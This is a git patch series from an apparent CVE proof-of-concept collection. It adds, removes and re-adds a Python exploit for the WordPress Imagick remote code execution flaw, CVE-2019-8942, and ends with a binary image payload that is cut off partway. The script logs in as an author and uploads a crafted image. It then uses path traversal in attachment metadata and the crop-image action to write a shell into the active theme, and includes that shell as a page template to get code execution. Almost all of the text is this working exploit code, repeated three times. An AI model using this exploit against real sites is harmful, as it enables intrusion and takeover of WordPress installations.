From ee8d08168c5d2f556e797cb5163337f5f1816913 Mon Sep 17 00:00:00 2001 From: bbj Date: Fri, 7 Apr 2023 12:22:42 +0000 Subject: [PATCH 01/19] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20WordPress?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/WordPress/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/WordPress/.keep diff --git a/cve/WordPress/.keep b/cve/WordPress/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From b93cdd6b561cc6223d34f8253d3bda29ca1526b5 Mon Sep 17 00:00:00 2001 From: bbj Date: Fri, 7 Apr 2023 12:25:00 +0000 Subject: [PATCH 02/19] add cve/WordPress/poc.py. Signed-off-by: bbj --- cve/WordPress/poc.py | 97 ++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 97 insertions(+) create mode 100644 cve/WordPress/poc.py diff --git a/cve/WordPress/poc.py b/cve/WordPress/poc.py new file mode 100644 index 00000000..853e4d08 --- /dev/null +++ b/cve/WordPress/poc.py @@ -0,0 +1,97 @@ +#!/usr/bin/python3 + +###################### +## Imagick RCE POC ## +###################### +import requests +import re + +url_root = 'http://localhost/' +theme = 'twentyseventeen' +current_date = '2019/03/' +filename = "imagick.jpg" + +session = requests.Session() +creds={'log':'author','pwd':'author','wp-submit':'Log In','redirect_to':'{url}wp-admin/'.format(url=url_root),'testcookie':1} +tmp={'wordpress_test_cookie':'WP Cookie check'} +r=session.post(url_root+'wp-login.php',cookies=tmp,data=creds) +wp_init_cookies=session.cookies + +#get nonce +response = requests.get('{url}wp-admin/media-new.php'.format(url=url_root),cookies=wp_init_cookies) +_wp_nonce = re.findall(r'name="_wpnonce" value="(\w+)"',response.text)[0] + + +#uploading image +data = { + 'post_id': '0', + '_wp_http_referer': '/wp-admin/media-new.php', + '_wpnonce': _wp_nonce, + 'action': 'upload_attachement', + 'html-upload': 'Upload' +} +evil = {'async-upload':(filename, open(filename, 'rb'))} +upload_result = session.post(url_root+'wp-admin/async-upload.php', data=data, files=evil, cookies=wp_init_cookies) +image_id=upload_result.text +print(f'Image ID: {image_id}') + +#First exploit :changing metadata +#Part 1 create folder ==> evil.jpg?/x +response=requests.get(url_root+'wp-admin/post.php?post='+image_id+'&action=edit',cookies=wp_init_cookies) +_wpnonce=re.findall(r'name="_wpnonce" value="(\w+)"',response.text)[0] +ajax_nonce = re.findall(r'imageEdit\.open\( \w+, "(\w+)"',response.text)[0] +print(ajax_nonce) +data={'_wpnonce':_wpnonce, +'action':'editpost', +'post_ID':image_id, +'meta_input[_wp_attached_file]':current_date+filename+'?/x' +} +response=requests.post(url_root+'wp-admin/post.php',data=data, cookies=wp_init_cookies) + +#Creating file with wrop-image +data={'action':'crop-image', +'_ajax_nonce':ajax_nonce, +'id':image_id, +'cropDetails[x1]':0, +'cropDetails[y1]':0, +'cropDetails[width]':400, +'cropDetails[height]':300, +'cropDetails[dst_width]':10, +'cropDetails[dst_height]':10} +response=requests.post(url_root+'wp-admin/admin-ajax.php',data=data, cookies=wp_init_cookies) + +#Part 2 creating file into current theme +data={'_wpnonce':_wpnonce, +'action':'editpost', +'post_ID':image_id, +'meta_input[_wp_attached_file]':current_date+filename+'?/../../../../themes/'+theme+'/shell' +} +response=requests.post(url_root+'wp-admin/post.php',data=data, cookies=wp_init_cookies) +data={'action':'crop-image', +'_ajax_nonce':ajax_nonce, +'id':image_id, +'cropDetails[x1]':0, +'cropDetails[y1]':0, +'cropDetails[width]':400, +'cropDetails[height]':300, +'cropDetails[dst_width]':10, +'cropDetails[dst_height]':10} +response=requests.post(url_root+'wp-admin/admin-ajax.php',data=data, cookies=wp_init_cookies) +print(response.text) + +#Including into theme +response=requests.post(url_root+'wp-admin/post-new.php', cookies=wp_init_cookies) +_wpnonce=re.findall(r'name="_wpnonce" value="(\w+)"',response.text)[0] +post_id=re.findall(r'"post":{"id":(\w+),',response.text)[0] +print(f'Post ID: {post_id}') + +data={'_wpnonce':_wpnonce, +'action':'editpost', +'post_ID':post_id, +'post_title':'wut', +'post_name':'wut', +'meta_input[_wp_page_template]':'cropped-shell.jpg' +} +response=requests.post(url_root+'wp-admin/post.php',data=data, cookies=wp_init_cookies) + +print(f'Rce at {url_root}?p={post_id}') \ No newline at end of file -- Gitee From 2b69204dc80ed87e9d21eaa33d6379e7d9a217c3 Mon Sep 17 00:00:00 2001 From: bbj Date: Fri, 7 Apr 2023 12:25:10 +0000 Subject: [PATCH 03/19] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/WordPress/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/WordPress/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/WordPress/.keep diff --git a/cve/WordPress/.keep b/cve/WordPress/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From e8f5971077d12c1ec7c70baa9a24695fb327762d Mon Sep 17 00:00:00 2001 From: bbj Date: Fri, 7 Apr 2023 12:26:09 +0000 Subject: [PATCH 04/19] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2019-8942?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/WordPress/CVE-2019-8942/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/WordPress/CVE-2019-8942/.keep diff --git a/cve/WordPress/CVE-2019-8942/.keep b/cve/WordPress/CVE-2019-8942/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 59261547c513980051c73de96a62eac365f66d65 Mon Sep 17 00:00:00 2001 From: bbj Date: Fri, 7 Apr 2023 12:26:28 +0000 Subject: [PATCH 05/19] =?UTF-8?q?=E6=96=B0=E5=BB=BA=202019?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/WordPress/2019/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/WordPress/2019/.keep diff --git a/cve/WordPress/2019/.keep b/cve/WordPress/2019/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From f56e0b6cb694a468256c55ed2863be3f238544e2 Mon Sep 17 00:00:00 2001 From: bbj Date: Fri, 7 Apr 2023 12:26:37 +0000 Subject: [PATCH 06/19] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/WordPress/poc.py?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/WordPress/poc.py | 97 -------------------------------------------- 1 file changed, 97 deletions(-) delete mode 100644 cve/WordPress/poc.py diff --git a/cve/WordPress/poc.py b/cve/WordPress/poc.py deleted file mode 100644 index 853e4d08..00000000 --- a/cve/WordPress/poc.py +++ /dev/null @@ -1,97 +0,0 @@ -#!/usr/bin/python3 - -###################### -## Imagick RCE POC ## -###################### -import requests -import re - -url_root = 'http://localhost/' -theme = 'twentyseventeen' -current_date = '2019/03/' -filename = "imagick.jpg" - -session = requests.Session() -creds={'log':'author','pwd':'author','wp-submit':'Log In','redirect_to':'{url}wp-admin/'.format(url=url_root),'testcookie':1} -tmp={'wordpress_test_cookie':'WP Cookie check'} -r=session.post(url_root+'wp-login.php',cookies=tmp,data=creds) -wp_init_cookies=session.cookies - -#get nonce -response = requests.get('{url}wp-admin/media-new.php'.format(url=url_root),cookies=wp_init_cookies) -_wp_nonce = re.findall(r'name="_wpnonce" value="(\w+)"',response.text)[0] - - -#uploading image -data = { - 'post_id': '0', - '_wp_http_referer': '/wp-admin/media-new.php', - '_wpnonce': _wp_nonce, - 'action': 'upload_attachement', - 'html-upload': 'Upload' -} -evil = {'async-upload':(filename, open(filename, 'rb'))} -upload_result = session.post(url_root+'wp-admin/async-upload.php', data=data, files=evil, cookies=wp_init_cookies) -image_id=upload_result.text -print(f'Image ID: {image_id}') - -#First exploit :changing metadata -#Part 1 create folder ==> evil.jpg?/x -response=requests.get(url_root+'wp-admin/post.php?post='+image_id+'&action=edit',cookies=wp_init_cookies) -_wpnonce=re.findall(r'name="_wpnonce" value="(\w+)"',response.text)[0] -ajax_nonce = re.findall(r'imageEdit\.open\( \w+, "(\w+)"',response.text)[0] -print(ajax_nonce) -data={'_wpnonce':_wpnonce, -'action':'editpost', -'post_ID':image_id, -'meta_input[_wp_attached_file]':current_date+filename+'?/x' -} -response=requests.post(url_root+'wp-admin/post.php',data=data, cookies=wp_init_cookies) - -#Creating file with wrop-image -data={'action':'crop-image', -'_ajax_nonce':ajax_nonce, -'id':image_id, -'cropDetails[x1]':0, -'cropDetails[y1]':0, -'cropDetails[width]':400, -'cropDetails[height]':300, -'cropDetails[dst_width]':10, -'cropDetails[dst_height]':10} -response=requests.post(url_root+'wp-admin/admin-ajax.php',data=data, cookies=wp_init_cookies) - -#Part 2 creating file into current theme -data={'_wpnonce':_wpnonce, -'action':'editpost', -'post_ID':image_id, -'meta_input[_wp_attached_file]':current_date+filename+'?/../../../../themes/'+theme+'/shell' -} -response=requests.post(url_root+'wp-admin/post.php',data=data, cookies=wp_init_cookies) -data={'action':'crop-image', -'_ajax_nonce':ajax_nonce, -'id':image_id, -'cropDetails[x1]':0, -'cropDetails[y1]':0, -'cropDetails[width]':400, -'cropDetails[height]':300, -'cropDetails[dst_width]':10, -'cropDetails[dst_height]':10} -response=requests.post(url_root+'wp-admin/admin-ajax.php',data=data, cookies=wp_init_cookies) -print(response.text) - -#Including into theme -response=requests.post(url_root+'wp-admin/post-new.php', cookies=wp_init_cookies) -_wpnonce=re.findall(r'name="_wpnonce" value="(\w+)"',response.text)[0] -post_id=re.findall(r'"post":{"id":(\w+),',response.text)[0] -print(f'Post ID: {post_id}') - -data={'_wpnonce':_wpnonce, -'action':'editpost', -'post_ID':post_id, -'post_title':'wut', -'post_name':'wut', -'meta_input[_wp_page_template]':'cropped-shell.jpg' -} -response=requests.post(url_root+'wp-admin/post.php',data=data, cookies=wp_init_cookies) - -print(f'Rce at {url_root}?p={post_id}') \ No newline at end of file -- Gitee From e3074e416659c4a7462471b7497b2e88f4cf6740 Mon Sep 17 00:00:00 2001 From: bbj Date: Fri, 7 Apr 2023 12:26:42 +0000 Subject: [PATCH 07/19] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/WordPress/CVE-2019-8942?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/WordPress/CVE-2019-8942/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/WordPress/CVE-2019-8942/.keep diff --git a/cve/WordPress/CVE-2019-8942/.keep b/cve/WordPress/CVE-2019-8942/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 4de8978b2597f17e670d00d04b0b0fe18376be2f Mon Sep 17 00:00:00 2001 From: bbj Date: Fri, 7 Apr 2023 12:27:04 +0000 Subject: [PATCH 08/19] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2019-8942?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/WordPress/2019/CVE-2019-8942/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/WordPress/2019/CVE-2019-8942/.keep diff --git a/cve/WordPress/2019/CVE-2019-8942/.keep b/cve/WordPress/2019/CVE-2019-8942/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 54fd5ec13e339e8bf8e7a8f5b32a0dd54fe2417e Mon Sep 17 00:00:00 2001 From: bbj Date: Fri, 7 Apr 2023 12:27:22 +0000 Subject: [PATCH 09/19] add cve/WordPress/2019/CVE-2019-8942/poc.py. Signed-off-by: bbj --- cve/WordPress/2019/CVE-2019-8942/poc.py | 97 +++++++++++++++++++++++++ 1 file changed, 97 insertions(+) create mode 100644 cve/WordPress/2019/CVE-2019-8942/poc.py diff --git a/cve/WordPress/2019/CVE-2019-8942/poc.py b/cve/WordPress/2019/CVE-2019-8942/poc.py new file mode 100644 index 00000000..853e4d08 --- /dev/null +++ b/cve/WordPress/2019/CVE-2019-8942/poc.py @@ -0,0 +1,97 @@ +#!/usr/bin/python3 + +###################### +## Imagick RCE POC ## +###################### +import requests +import re + +url_root = 'http://localhost/' +theme = 'twentyseventeen' +current_date = '2019/03/' +filename = "imagick.jpg" + +session = requests.Session() +creds={'log':'author','pwd':'author','wp-submit':'Log In','redirect_to':'{url}wp-admin/'.format(url=url_root),'testcookie':1} +tmp={'wordpress_test_cookie':'WP Cookie check'} +r=session.post(url_root+'wp-login.php',cookies=tmp,data=creds) +wp_init_cookies=session.cookies + +#get nonce +response = requests.get('{url}wp-admin/media-new.php'.format(url=url_root),cookies=wp_init_cookies) +_wp_nonce = re.findall(r'name="_wpnonce" value="(\w+)"',response.text)[0] + + +#uploading image +data = { + 'post_id': '0', + '_wp_http_referer': '/wp-admin/media-new.php', + '_wpnonce': _wp_nonce, + 'action': 'upload_attachement', + 'html-upload': 'Upload' +} +evil = {'async-upload':(filename, open(filename, 'rb'))} +upload_result = session.post(url_root+'wp-admin/async-upload.php', data=data, files=evil, cookies=wp_init_cookies) +image_id=upload_result.text +print(f'Image ID: {image_id}') + +#First exploit :changing metadata +#Part 1 create folder ==> evil.jpg?/x +response=requests.get(url_root+'wp-admin/post.php?post='+image_id+'&action=edit',cookies=wp_init_cookies) +_wpnonce=re.findall(r'name="_wpnonce" value="(\w+)"',response.text)[0] +ajax_nonce = re.findall(r'imageEdit\.open\( \w+, "(\w+)"',response.text)[0] +print(ajax_nonce) +data={'_wpnonce':_wpnonce, +'action':'editpost', +'post_ID':image_id, +'meta_input[_wp_attached_file]':current_date+filename+'?/x' +} +response=requests.post(url_root+'wp-admin/post.php',data=data, cookies=wp_init_cookies) + +#Creating file with wrop-image +data={'action':'crop-image', +'_ajax_nonce':ajax_nonce, +'id':image_id, +'cropDetails[x1]':0, +'cropDetails[y1]':0, +'cropDetails[width]':400, +'cropDetails[height]':300, +'cropDetails[dst_width]':10, +'cropDetails[dst_height]':10} +response=requests.post(url_root+'wp-admin/admin-ajax.php',data=data, cookies=wp_init_cookies) + +#Part 2 creating file into current theme +data={'_wpnonce':_wpnonce, +'action':'editpost', +'post_ID':image_id, +'meta_input[_wp_attached_file]':current_date+filename+'?/../../../../themes/'+theme+'/shell' +} +response=requests.post(url_root+'wp-admin/post.php',data=data, cookies=wp_init_cookies) +data={'action':'crop-image', +'_ajax_nonce':ajax_nonce, +'id':image_id, +'cropDetails[x1]':0, +'cropDetails[y1]':0, +'cropDetails[width]':400, +'cropDetails[height]':300, +'cropDetails[dst_width]':10, +'cropDetails[dst_height]':10} +response=requests.post(url_root+'wp-admin/admin-ajax.php',data=data, cookies=wp_init_cookies) +print(response.text) + +#Including into theme +response=requests.post(url_root+'wp-admin/post-new.php', cookies=wp_init_cookies) +_wpnonce=re.findall(r'name="_wpnonce" value="(\w+)"',response.text)[0] +post_id=re.findall(r'"post":{"id":(\w+),',response.text)[0] +print(f'Post ID: {post_id}') + +data={'_wpnonce':_wpnonce, +'action':'editpost', +'post_ID':post_id, +'post_title':'wut', +'post_name':'wut', +'meta_input[_wp_page_template]':'cropped-shell.jpg' +} +response=requests.post(url_root+'wp-admin/post.php',data=data, cookies=wp_init_cookies) + +print(f'Rce at {url_root}?p={post_id}') \ No newline at end of file -- Gitee From 6207b617801376831effaf57124990d2bb8b4cf2 Mon Sep 17 00:00:00 2001 From: bbj Date: Fri, 7 Apr 2023 12:28:35 +0000 Subject: [PATCH 10/19] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/WordPress/2019/CVE-2019-8942/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/WordPress/2019/CVE-2019-8942/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/WordPress/2019/CVE-2019-8942/.keep diff --git a/cve/WordPress/2019/CVE-2019-8942/.keep b/cve/WordPress/2019/CVE-2019-8942/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From aa16a30e8d4847bf1390c427e6a204f3840dc84b Mon Sep 17 00:00:00 2001 From: bbj Date: Fri, 7 Apr 2023 12:28:47 +0000 Subject: [PATCH 11/19] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/WordPress/2019/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/WordPress/2019/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/WordPress/2019/.keep diff --git a/cve/WordPress/2019/.keep b/cve/WordPress/2019/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From c249b13b4b02c0010483ef8d6e90d312c3d07ff8 Mon Sep 17 00:00:00 2001 From: bbj Date: Fri, 7 Apr 2023 12:30:04 +0000 Subject: [PATCH 12/19] image used Signed-off-by: bbj --- cve/WordPress/2019/CVE-2019-8942/imagick.jpg | Bin 0 -> 28561 bytes 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/WordPress/2019/CVE-2019-8942/imagick.jpg diff --git a/cve/WordPress/2019/CVE-2019-8942/imagick.jpg b/cve/WordPress/2019/CVE-2019-8942/imagick.jpg new file mode 100644 index 0000000000000000000000000000000000000000..26bf6fdc1ad140fd556848ef597d11d9a38efc15 GIT binary patch literal 28561 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 